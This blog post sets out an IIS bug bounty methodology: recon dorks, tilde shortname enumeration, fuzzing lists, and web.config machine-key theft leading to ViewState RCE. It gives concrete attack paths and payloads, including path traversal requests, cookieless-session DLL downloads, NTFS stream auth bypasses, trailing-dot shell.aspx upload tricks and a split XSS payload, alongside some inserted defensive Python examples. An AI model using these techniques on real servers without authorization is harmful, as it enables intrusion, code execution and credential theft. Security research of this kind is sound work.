humiliating iis servers for fun and jail time
Miguel Llamazares · 2026-06-17 · via Hacker News: Best

13 minutes read

A friend of mine once told me:

If you ever spot an IIS blue screen, don’t stop there; there must be something.

Yep, he was right. That IIS splash page is not a dead end. Behind that blue window sits one of the most consistently misconfigured web servers on the www, and it’s begging you to look deeper.

So let me walk you through how I approach IIS targets during bug bounty:

table of contents

  • psst, psst, IIS servers, where are you?
    • shodan
    • google dorking
    • active tech fingerprinting
  • ok, I found an IIS server. now what?
    • internal IP disclosure
  • pwn time
    • nuclei templates: automate the boring stuff
    • the HTTPAPI 2.0 dead end that isn’t
    • IIS tilde enumeration: the gift that keeps giving
      • using LLMs
      • github dorks to resolve shortnames
      • using BigQuery to resolve shortnames
      • bruteforcing the rest with crunch
    • fuzzing: the IIS-specific wordlist matters
    • web.config: the keys to the kingdom
      • path traversal to web.config
      • bin directory DLL exposure via cookieless sessions
    • reverse proxy path confusion
    • authentication bypass via NTFS hacks
    • file upload tricks
  • bypassing WAFs via HPP

psst, psst, IIS servers, where are you?

Here are some techniques I use to find IIS servers.

shodan

Before you even touch a target, go see what Shodan already knows:

ssl:"target.com" http.title:"IIS"
ssl.cert.subject.CN:"target.com" http.title:"IIS"
org:"target" http.title:"IIS"

These sample queries will list IIS boxes tied to the target’s org or SSL certificates. You’ll sometimes find staging servers, forgotten admin panels, and internal tools that nobody realized were internet-facing.

Feel free to replace or combine shodan with other platforms like fofa, censys, netlas, odin, etc. They all index different slices of the internet. 🍕

google dorking

Google can find IIS servers for you before you even fire up a scanner. These dorks are all about locating IIS targets within a scope:

site:target.com intitle:"IIS Windows Server"
site:target.com inurl:aspnet_client
site:target.com ext:aspx | ext:ashx | ext:asmx
site:target.com intext:"Microsoft-IIS" | intext:"X-Powered-By: ASP.NET"
site:target.com inurl:_vti_bin
site:target.com intitle:"Microsoft Internet Information Services"

The aspnet_client folder and _vti_bin (FrontPage extensions) are dead giveaways for IIS; if Google has indexed them, you’ve got a target. The ext:aspx dork catches any indexed ASP.NET pages, which means IIS is underneath.

Also, expand your scope with stacked wildcards to catch nested subdomains that basic enumeration misses:

site:*.target.com intitle:"IIS"
site:*.*.target.com intitle:"IIS"

That second one has surfaced dev/staging boxes for me more than once.

active tech fingerprinting

The easiest way to know you’re staring at IIS is the response headers. Hit it with a raw request:

nc -v target.com 80

Or if it’s TLS:

openssl s_client -connect target.com:443

Once connected, type a minimal request followed by an empty line:

HEAD / HTTP/1.1
Host: target.com

What you’re looking for is something like this in the response headers:

Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

But probably you want to do this at scale. Then just keep calm and use httpx (or nuclei). Keep only the URL column so the output file can be fed straight into the next tool:

httpx -l targets.txt -td -silent | grep -i IIS | awk '{print $1}' | tee iis-targets.txt

ok, I found an IIS server. now what?

First off, let’s confirm what we’re dealing with and grab as much information as the server is willing to give away for free.

internal IP disclosure

Here’s a freebie most people miss. Send an HTTP/1.0 request with no Host header to certain IIS setups (especially Exchange or OWA fronts) and the server will sometimes build its redirect from its own binding instead of the Host header, handing you an internal IP in the Location header. Note that curl still adds a Host header under --http1.0, so strip it explicitly (or type `GET / HTTP/1.0` into the nc session above):

curl -v --http1.0 -H "Host:" http://example.com

You might get back something like:

HTTP/1.1 302 Moved Temporarily
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

That internal IP and that X-FEServer header just told you the internal hostname of the Exchange server. File that away. It’s information disclosure that we could leverage in the following steps.
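To make the header check and the internal IP check repeatable, here is a small added example (my code, not part of the original post): it sends the bare HTTP/1.0 probe, parses the headers, and flags any private address that leaks in a Location or other header. SAMPLE_RESPONSE is a constructed copy of the OWA redirect above; send_probe, triage and parse_headers are names I chose.

```python
import ipaddress
import re
import socket
import ssl

# A bare HTTP/1.0 request with no Host header. curl --http1.0 still adds Host:,
# which is why the curl command above strips it with -H "Host:".
PROBE = b"GET / HTTP/1.0\r\n\r\n"

# Constructed sample response modelled on the OWA redirect shown above (no real host).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Location: https://192.168.5.237/owa/\r\n"
    b"Server: Microsoft-IIS/10.0\r\n"
    b"X-FEServer: NHEXCHANGE2016\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

_IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_headers(raw: bytes):
    """Split a raw HTTP response into (status line, {lower-cased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", errors="replace")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def triage(raw: bytes) -> dict:
    """Pull the recon-relevant bits out of a response: IIS version, ASP.NET marker,
    the Exchange front-end name, and any RFC 1918 / link-local address leaked in a header."""
    status, headers = parse_headers(raw)
    version = re.search(r"Microsoft-IIS/([\d.]+)", headers.get("server", ""))
    leaked = []
    for value in headers.values():
        for candidate in _IPV4.findall(value):
            try:
                addr = ipaddress.ip_address(candidate)
            except ValueError:
                continue  # e.g. 999.1.1.1 matched the regex but is not an address
            if addr.is_private or addr.is_link_local:
                leaked.append(candidate)
    return {
        "status": status,
        "iis_version": version.group(1) if version else None,
        "aspnet": "asp.net" in headers.get("x-powered-by", "").lower(),
        "fe_server": headers.get("x-feserver"),
        "internal_ips": leaked,
    }


def send_probe(host: str, port: int = 80, tls: bool = False, timeout: float = 5.0) -> bytes:
    """Send PROBE over plain TCP (or TLS without certificate checks, which is what
    you want when poking at self-signed internal fronts) and return the raw response."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(PROBE)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSE))
    # Live use: print(triage(send_probe("example.com", 443, tls=True)))
```

Anything in internal_ips goes into your notes together with fe_server: both feed later steps (vhost guessing, phishing-resistant naming conventions, SSRF targets) even when the front end itself is clean.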

pwn time

Enough recon by now, let’s get to the juicy parts.

nuclei templates: automate the boring stuff

Once you’ve got your list of IIS targets, blast them with nuclei using relevant tags:

nuclei -l iis-targets.txt \
    -tags microsoft,windows,asp,aspx,iis,azure,config,exposure -silent

I like to fire this in the background while I’m doing manual recon.

the HTTPAPI 2.0 dead end that isn’t

You’ll hit a lot of IIS boxes that respond with a generic HTTPAPI 2.0 404 error. Most people see this and think “nothing here.” Wrong.

What this actually means is the server didn’t receive the right domain name in the Host header. The IIS instance is there, it’s running something, but it’s bound to a specific virtual host. You need to figure out which one.

Two approaches:

  1. check the SSL certificate. The subject or SAN field often contains the hostname you need. Just hit it in a browser and inspect the cert, or pull the SANs from the command line:

    openssl s_client -connect TARGET_IP:443 </dev/null 2>/dev/null | openssl x509 -noout -text | grep DNS:

  2. if the cert doesn’t help, you brute-force virtual hosts. Tools like ffuf with a Host header wordlist work well here. The HTTPAPI 404 page is not empty, so don’t filter on size zero; let ffuf’s auto-calibration learn the size of the default response and drop it:

    ffuf -u https://TARGET_IP/ -H "Host: FUZZ.target.com" -w vhosts.txt -ac
    

    When you land on the right hostname, the server suddenly wakes up and serves you a real application instead of that useless 404.

IIS tilde enumeration: the gift that keeps giving

This is one of the most underrated techniques. IIS has a legacy behavior inherited from the old DOS 8.3 filename convention: NTFS still generates a short name (WEB~1.CON for web.config) for every file or directory whose long name doesn’t fit 8.3, and IIS responds differently to a wildcard request that matches an existing short name than to one that doesn’t. By sending specially crafted requests, you can enumerate the short names of files and directories on the server even if directory listing is disabled.

The tool you want is shortscan:

shortscan https://target.com/ -F -p 1

Here -F prints the full URL for every file it confirms, and -p 1 raises the patience level, which spends more requests per name in exchange for fewer misses.

Another tool you can use is burp’s IIS Tilde Enumeration Scanner.

This will spit out shortname fragments like:

File: WEB~1.CON
File: GLOBAL~1.ASA
File: SITEBA~1.ZIP
Dir:  ADMIN~1

Now here’s the thing: WEB~1.CON is obviously web.config. But what’s SITEBA~1.ZIP? Is it sitebackup.zip? sitebase.zip? sitebatch.zip? If we can guess the full name, we can try to download it.

Let’s explore some options for wordlist generation:

using LLMs

Something like:

Return only a list of words, separated by newlines, and nothing else. Ensure that the words contain only alphanumeric characters.
Make a list of guesses, for what the rest of the word could be from this snippet. Ensure that the snippet is a substring of your guess. 
Make the list as extensive as possible.
Snippet: {shortname}

github dorks to resolve shortnames

GitHub’s code search is basically a free filename database. Millions of repos mean millions of real-world filenames you can pattern-match against your shortname fragments. Way more effective than guessing blindly.

The idea: take the first 6 characters from your shortname (everything before ~1) and search GitHub for filenames that start with those characters and end with the right extension.

Using GitHub’s code search UI directly:

# In GitHub's search bar, select "Code" and use path: filters
path:/.ds_st*
path:/global*.asa
path:/connec*.config

(screenshot: IIS GitHub dork)

To pseudo-automate this, check out GSNW (GitHub Short Name Wordlist). You feed it your shortname fragments and it scrapes GitHub code search for matching filenames:

python gsnw.py "siteba" output.txt

There’s also GitHub-IIS-Shortname-Generator which does the same thing and outputs a clean wordlist:

python scanner.py WEBDEV
Found matches:
--------------------------------------------------
- WebDev.md
- WebDeveloper.java
- webdev.txt
- webdevicons.lua
--------------------------------------------------
Total unique matches: 86

Another cool option is shortnameguesser, which takes shortname scanner output and generates targeted wordlists by querying multiple sources to resolve the fragments.

using BigQuery to resolve shortnames

This is where it gets interesting. This technique is inspired by Assetnote’s research on using BigQuery to find hidden files on IIS. The idea is simple: use Google BigQuery’s public GitHub dataset to search the entire GitHub codebase for filenames that match your shortname pattern.

If your shortname scan returned SITEBA~1.ZIP, you run this in BigQuery:

SELECT DISTINCT path
FROM `bigquery-public-data.github_repos.files`
WHERE REGEXP_CONTAINS(path, r'(?i)(\/siteba[a-z0-9]+\.zip|^siteba[a-z0-9]+\.zip)')
LIMIT 1000

You’ll get back real filenames from real projects: sitebackup.zip, sitebase.zip, and so on. Now you have a focused wordlist instead of blindly guessing. One caveat: BigQuery bills by bytes scanned and this table is big, so look at the estimate the console shows before running the query (LIMIT doesn’t reduce what gets scanned).

bruteforcing the rest with crunch

When LLMs, GitHub, and BigQuery all come up empty, sometimes you just need to go dumb and brute-force the remaining characters. crunch generates wordlists of every possible combination for a given character length:

crunch 4 6 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

This generates every lowercase alphabetic string from 4 to 6 characters long. That is about 321 million lines (26^4 + 26^5 + 26^6), so start with a shorter range or a smaller charset unless you can really afford that many requests per pattern. Since 8.3 shortnames show you the first 6 characters, you typically only need to guess the remaining portion.

Say shortscan gave you DESKTO~1.ZIP. You know the filename starts with deskto and ends with .zip. Now you need to figure out what comes after deskto. The file could be desktop.zip, desktopbackup.zip, desktop-files.zip, etc. Use ffuf with pattern-based fuzzing to cover the variations:

ffuf -w wordlist.txt -u https://target.com/desktoFUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop-FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop_FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop%20FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktopFUZZ.zip -mc 200,301,302,403

Note the different separators: hyphen, underscore, URL-encoded space, and no separator at all. Developers are inconsistent with naming conventions, so you want to cover all patterns. The %20 variant catches the surprisingly common case where someone named their file with a space in it — Windows doesn’t care, and IIS will serve it just fine.

This is the brute-force fallback when the smart approaches fail, and honestly, it works more often than you’d expect.

fuzzing: the IIS-specific wordlist matters

Generic wordlists are fine for generic servers. IIS is not generic. You need to fuzz for things that only exist in the IIS/.NET ecosystem.

These are high-value targets to fuzz for:

/web.config
/web.config.bak
/web.config.old
/web.config.txt
/global.asax
/trace.axd
/elmah.axd
/connectionstrings.config
/appsettings.json
/appsettings.Development.json
/appsettings.Staging.json
/appsettings.Production.json
/appsettings.Local.json
/secrets.json
/WS_FTP.LOG
/_vti_pvt/service.cnf

For instance, trace.axd is the ASP.NET trace viewer. If it’s enabled, you get full request/response logs including headers, cookies, and sometimes credentials. elmah.axd is the error log viewer; same deal. These are essentially debug endpoints that developers forget to turn off. 🫣

And always fuzz with IIS-specific extensions:

.asp,.aspx,.ashx,.asmx,.wsdl,.wadl,.config,.xml,.zip,.txt,.dll,.json

A practical ffuf command:

ffuf -u https://target.com/FUZZ -w iis-wordlist.txt \
     -e .asp,.aspx,.ashx,.asmx,.config,.json,.xml,.zip,.bak,.txt \
     -mc 200,301,302,403 -fs 0

Some IIS-specific wordlists that I like:

  • secLists IIS.txt: the classic. Covers default IIS paths, common handlers, and legacy files. Use it without adding extensions since the entries already include them.
  • orwa’s iis.txt: curated by Godfather Orwa (the same guy from the “THE POWER OF RECON” talk in the references below). Battle-tested on real bug bounty programs. This is the one I reach for first. 👑
  • orwa’s aspx.txt: companion to the above, focused specifically on .aspx endpoints.
  • wfuzz iis.txt: small but focused on known-vulnerable IIS paths.
  • dirbuster-ng iis.txt: another compact one that targets IIS-specific weaknesses.
  • Assetnote wordlists: auto-generated from real-world crawl data, updated monthly. Grab the ASP and ASPX wordlists. These are derived from actual production applications, so the hit rate is significantly better than generic lists.
  • OneListForAll: the “rockyou of web fuzzing.” Use onelistforallshort.txt for targeted runs and leave the full list running overnight.

pro tip

IIS paths are case-insensitive, because the NTFS volume underneath is. If your wordlist is mixed-case, you’re wasting requests on duplicates. Use a lowercased wordlist like SecLists’ raft-medium-words-lowercase.txt or pipe your custom list through tr '[:upper:]' '[:lower:]' | sort -u before feeding it to ffuf.

web.config: the keys to the kingdom

If you can read web.config through a path traversal, a misconfigured backup file, or a shortname-assisted discovery, you’ve potentially won the entire engagement.

Here’s why: IIS web.config files often contain machine keys. These are the cryptographic keys used to sign and encrypt ViewState. If you have the machine keys, you can forge a malicious serialized ViewState payload and achieve remote code execution via deserialization.

This is one of the most reliable IIS RCE chains in existence. Tools like ysoserial.net will generate the payload for you once you have the keys: its ViewState plugin takes the validationKey and validation algorithm from web.config plus the target page’s __VIEWSTATEGENERATOR value (or the --path and --apppath pair) and emits a ViewState the server will happily deserialize. If the keys read AutoGenerate,IsolateApps instead of hex, they live outside web.config and this shortcut is off the table. 🔑
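Once you have a web.config in hand, the first pass is mechanical, so here is an added triage script (mine, not the author’s, and unrelated to ysoserial.net): it pulls the machineKey attributes the ViewState plugin wants and flags connection strings with embedded passwords, debug compilation, customErrors Off and a remotely enabled trace.axd. SAMPLE_WEB_CONFIG is a constructed file with made-up values; machine_key and triage_web_config are names I chose.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample standing in for a leaked web.config. Every value below is
# made up (the keys are just repeated hex), purely to exercise the checks.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="MainDb" providerName="System.Data.SqlClient"
         connectionString="Server=sql01.corp.local;Database=app;User Id=app_user;Password=NotARealPassword1!" />
  </connectionStrings>
  <system.web>
    <compilation debug="true" targetFramework="4.8" />
    <customErrors mode="Off" />
    <trace enabled="true" localOnly="false" />
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
"""


def machine_key(xml_text: str):
    """Return the static <machineKey> attributes ysoserial.net's ViewState plugin
    needs, or None when the keys are absent or AutoGenerate (then they live in
    machine.config / the registry, not in this file)."""
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    if mk is None:
        return None
    keys = {attr: mk.get(attr) for attr in ("validationKey", "decryptionKey", "validation", "decryption")}
    if any(v is None or v.startswith("AutoGenerate") for v in (keys["validationKey"], keys["decryptionKey"])):
        return None
    return keys


def triage_web_config(xml_text: str):
    """List (severity, finding) pairs for the settings that matter to an attacker."""
    root = ET.fromstring(xml_text)
    findings = []

    keys = machine_key(xml_text)
    if keys:
        findings.append(("critical", "static machineKey (validation=%s, decryption=%s): ViewState forgery is on the table"
                         % (keys["validation"] or "default", keys["decryption"] or "default")))
    else:
        findings.append(("info", "no static machineKey in this file"))

    for add in root.iterfind("./connectionStrings/add"):
        if re.search(r"(?i)\b(password|pwd)\s*=", add.get("connectionString", "")):
            findings.append(("high", "connection string %r embeds a password" % add.get("name")))

    def flag(path, attr, bad_value, severity, message):
        node = root.find(path)
        if node is not None and node.get(attr, "").lower() == bad_value:
            findings.append((severity, message))

    flag("./system.web/compilation", "debug", "true", "medium", "debug compilation: verbose errors for everyone")
    flag("./system.web/customErrors", "mode", "off", "medium", "customErrors Off: stack traces go to remote clients")
    trace = root.find("./system.web/trace")
    if trace is not None and trace.get("enabled", "").lower() == "true" and trace.get("localOnly", "true").lower() == "false":
        findings.append(("high", "trace.axd is enabled for remote clients"))
    return findings


if __name__ == "__main__":
    for severity, text in triage_web_config(SAMPLE_WEB_CONFIG):
        print(f"[{severity}] {text}")
```

The machine_key() result maps one-to-one onto the --validationkey, --validationalg, --decryptionkey and --decryptionalg arguments of the ViewState plugin; the generator value still has to come from the target page.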

path traversal to web.config

If you find any kind of file download or file read parameter, try stuff like:

GET /download?id=../../web.config
GET /download?id=..%2f..%2fweb.config

bin directory DLL exposure via cookieless sessions

Even without a path traversal, there’s a slick way to pull DLLs straight out of the bin directory. ASP.NET’s legacy cookieless session feature lets you embed a session token directly in the URL path using the (S(X)) syntax. The beautiful part: you can abuse this to confuse IIS’s path resolution and access the bin folder even when it should be blocked.

GET /(S(X))/b/(S(X))in/Newtonsoft.Json.dll

That URL looks like gibberish, but ASP.NET interprets the (S(X)) segments as cookieless session tokens, strips them during path normalization, and ultimately resolves the path to /bin/Newtonsoft.Json.dll. This is a classic ASP.NET (System.Web on .NET Framework) behavior: ASP.NET Core apps don’t honour cookieless segments, and Microsoft has since patched it, so a 404 here may just mean an up-to-date host rather than an empty bin directory.

Now, Newtonsoft.Json.dll is a default library and won’t contain application secrets on its own. But the technique works for any DLL in the bin directory. If you’ve already enumerated filenames via tilde shortnames or other methods, swap in the actual application DLLs:

GET /(S(X))/b/(S(X))in/WebApplication1.dll
GET /(S(X))/b/(S(X))in/App_Code.dll
GET /(S(X))/b/(S(X))in/MyCustomAPI.dll

Download those, throw them into JetBrains dotPeek or dnSpy, and you’re reading the full decompiled source code: hardcoded credentials, API keys, internal endpoint logic, custom auth implementations; everything the developers thought was safely compiled away. 💀

reverse proxy path confusion

When IIS sits behind a reverse proxy (or acts as one), you can sometimes exploit path normalization differences to access paths you shouldn’t.

The classic trick: if /admin/ returns 403 or redirects you, try:

/anything/..%2fadmin/

The proxy matches its rules against the raw path: it sees /anything/ followed by a segment literally named ..%2fadmin, nothing that looks like /admin, so it forwards the request. IIS then decodes %2f to /, collapses the .., and serves /admin/. You just bypassed the access control. The same idea works with a backslash (..%5c), which IIS also treats as a path separator, and with double encoding (..%252f) when something in the chain decodes twice.
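An added model of the confusion (example code, not from the post): proxy_decision is the weak front-end rule that looks at the raw path, backend_resolve is how IIS ends up canonicalising it, and hardened_decision shows the fix, which is to authorise on the canonical form and reject double encoding. The protected prefix and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote

PROTECTED_PREFIX = "/admin"


def in_protected(path: str) -> bool:
    """Segment-aware prefix test: /admin and /admin/... match, /administrator does not."""
    p = path.lower()
    return p == PROTECTED_PREFIX or p.startswith(PROTECTED_PREFIX + "/")


def proxy_decision(raw_path: str) -> str:
    """The weak front-end rule: look at the path exactly as it arrived, decode nothing.
    '/anything/..%2fadmin/' starts with '/anything', so it is forwarded."""
    return "block" if in_protected(raw_path) else "forward"


def backend_resolve(raw_path: str) -> str:
    """What IIS serves: percent-decode, treat '\\' as '/', then collapse '.' and '..'."""
    decoded = unquote(raw_path).replace("\\", "/")
    return posixpath.normpath(decoded)


def is_bypass(raw_path: str) -> bool:
    """True when the proxy forwards a request that IIS resolves into the protected tree."""
    return proxy_decision(raw_path) == "forward" and in_protected(backend_resolve(raw_path))


def hardened_decision(raw_path: str) -> str:
    """The fix: authorise on the same canonical form the backend will use, and refuse
    anything that would still change if decoded again (double encoding such as %252f)."""
    if "%" in unquote(raw_path):
        return "block"
    return "block" if in_protected(backend_resolve(raw_path)) else "forward"


if __name__ == "__main__":
    for p in ["/admin/", "/anything/..%2fadmin/", "/anything/..%5cadmin/",
              "/anything/..%252fadmin/", "/public/index.aspx"]:
        print(f"{p:28} proxy={proxy_decision(p):8} iis={backend_resolve(p):24} "
              f"bypass={is_bypass(p)!s:5} hardened={hardened_decision(p)}")
```

The %252f case is the interesting one: with a single decode IIS does not collapse it, so it is not a bypass in this model, yet hardened_decision still rejects it, because a path that changes under a second decode is never one you want to reason about.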

authentication bypass via NTFS hacks

IIS 7.5 and similar versions have a fun behavior with NTFS alternate data streams and index allocation. You can sometimes bypass basic authentication with paths like:

/admin::$INDEX_ALLOCATION/admin.php
/admin:$i30:$INDEX_ALLOCATION/admin.php

These exploit how IIS resolves NTFS metadata streams. The authentication module sees a path it doesn’t recognize as protected, but the file system resolves it to the actual directory anyway.

file upload tricks

If you find an upload function on an IIS target, the developers almost certainly blacklisted .aspx and .asp. But IIS serves a surprising number of extensions as text/html by default, which means stored XSS through file upload.

Extensions that render as HTML (basic XSS vector works):

.cer
.hxt
.htm

Extensions that support XML-based XSS vectors:

.dtd, .mno, .vml, .xsl, .xht, .svg, .xml, .xsd,
.xsf, .svgz, .xslt, .wsdl, .xhtml

And Windows has a quirk with trailing dots in filenames. If the upload filter blocks shell.aspx, try:

shell.aspx.
shell.aspx..
shell.aspx...

The filter sees an extension that isn’t .aspx, but the Win32 file APIs drop trailing dots (and trailing spaces) when the file is written, so what lands on disk is shell.aspx, and IIS executes it as usual. This has been a known bypass for years and people still don’t filter for it. 🤷

For server-side includes, these extensions are worth trying:

.stm, .shtm, .shtml
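The vulnerable check next to its fix, as an added example (mine, not from the post): naive_is_blocked is the usual last-extension blacklist, on_disk_name is what Win32 does to trailing dots and spaces, and hardened_is_allowed decides on the on-disk name against an allowlist, so .cer, .svg and the other HTML-rendered extensions from the lists above never get stored either. The blacklist and allowlist contents and the function names are assumptions.

```python
import os

# Extensions the naive filter below thinks about (the "blacklisted .aspx and .asp" case).
BLACKLIST = {".asp", ".aspx"}
# Extensions the hardened check is willing to store, and nothing else.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def naive_is_blocked(filename: str) -> bool:
    """The typical check: take the last extension and compare it with a blacklist.
    'shell.aspx.' has the extension '.' here, so it sails through."""
    return os.path.splitext(filename)[1].lower() in BLACKLIST


def on_disk_name(filename: str) -> str:
    """What Win32 actually creates: trailing dots and spaces are silently dropped,
    so 'shell.aspx...' lands as 'shell.aspx', which IIS then executes."""
    return filename.rstrip(". ")


def hardened_is_allowed(filename: str) -> bool:
    """Decide on the name as it will exist on disk, refuse anything that is not a
    plain name with exactly one allowed extension, and refuse NTFS stream syntax."""
    name = on_disk_name(filename)
    if not name or "::" in name or "/" in name or "\\" in name:
        return False
    stem, ext = os.path.splitext(name)
    if ext.lower() not in ALLOWLIST:
        return False
    # one extension only: 'shell.aspx.png' is rejected even though .png is allowed
    return bool(stem) and "." not in stem


if __name__ == "__main__":
    for f in ["shell.aspx", "shell.aspx.", "shell.aspx...", "shell.aspx ",
              "xss.cer", "xss.svg", "shell.aspx.png", "photo.png"]:
        print(f"{f!r:18} naive_blocked={naive_is_blocked(f)!s:5} "
              f"on_disk={on_disk_name(f)!r:14} hardened_allowed={hardened_is_allowed(f)}")
```

Note the trailing-space variant: it passes the naive check for the same reason as the trailing dot, and is normalised away on disk by the same rule.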

bypassing WAFs via HPP

One last trick. If there’s a WAF in front of the IIS target blocking your payloads, HTTP Parameter Pollution (HPP) can sometimes split your payload across duplicate parameters:

https://target.com/page?param=<svg/&param=onload=alert(1)>

ASP.NET’s Request.QueryString is a NameValueCollection, so reading a parameter that appears twice returns the two values joined by a comma; that join can reassemble your payload on the other side of the WAF.
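A model of the join and of the two ways a WAF can look at it, added here as example code (not from the post): aspnet_query_string reproduces the comma join of Request.QueryString, waf_inspects_each_value is the per-value inspection that the split payload slips past, and waf_inspects_joined is the same rule applied to what the application will actually see. The toy WAF regex and the function names are mine.

```python
import re
from urllib.parse import parse_qs

# Toy WAF rule: a tag that carries an on*= event handler attribute.
_BAD = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I)


def aspnet_query_string(query: str) -> dict:
    """Model of Request.QueryString on ASP.NET: a NameValueCollection that returns
    duplicate values joined by ',' when you index it by name."""
    params = parse_qs(query, keep_blank_values=True)
    return {k: ",".join(v) for k, v in params.items()}


def waf_inspects_each_value(query: str) -> bool:
    """Per-value inspection. With the split payload every value is harmless on its
    own ('<svg/' and 'onload=alert(1)>'), so this returns False."""
    params = parse_qs(query, keep_blank_values=True)
    return any(_BAD.search(v) for values in params.values() for v in values)


def waf_inspects_joined(query: str) -> bool:
    """The fix on the WAF side: inspect the value the framework will hand to the app."""
    return any(_BAD.search(v) for v in aspnet_query_string(query).values())


if __name__ == "__main__":
    q = "param=<svg/&param=onload=alert(1)>"
    print(aspnet_query_string(q)["param"])
    print("per-value blocked:", waf_inspects_each_value(q), "joined blocked:", waf_inspects_joined(q))
```

Whether the reassembled string is a working payload in the browser is a separate question; the point of the model is that the inspection boundary and the consumption boundary differ, and only the second one decides what the application sees.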

bottom line

As we’ve seen, the attack surface of IIS in bug bounty is pretty wide but consistently under-tested. Everyone’s off chasing the latest js framework vuln while these windows boxes sit there, leaking internal IPs, serving up their own config files, and running with shortname enumeration wide open.

So don’t skip the blue screen. Recon harder. 🕵

further reading

There are some cool references I’ve collected throughout preparing this post: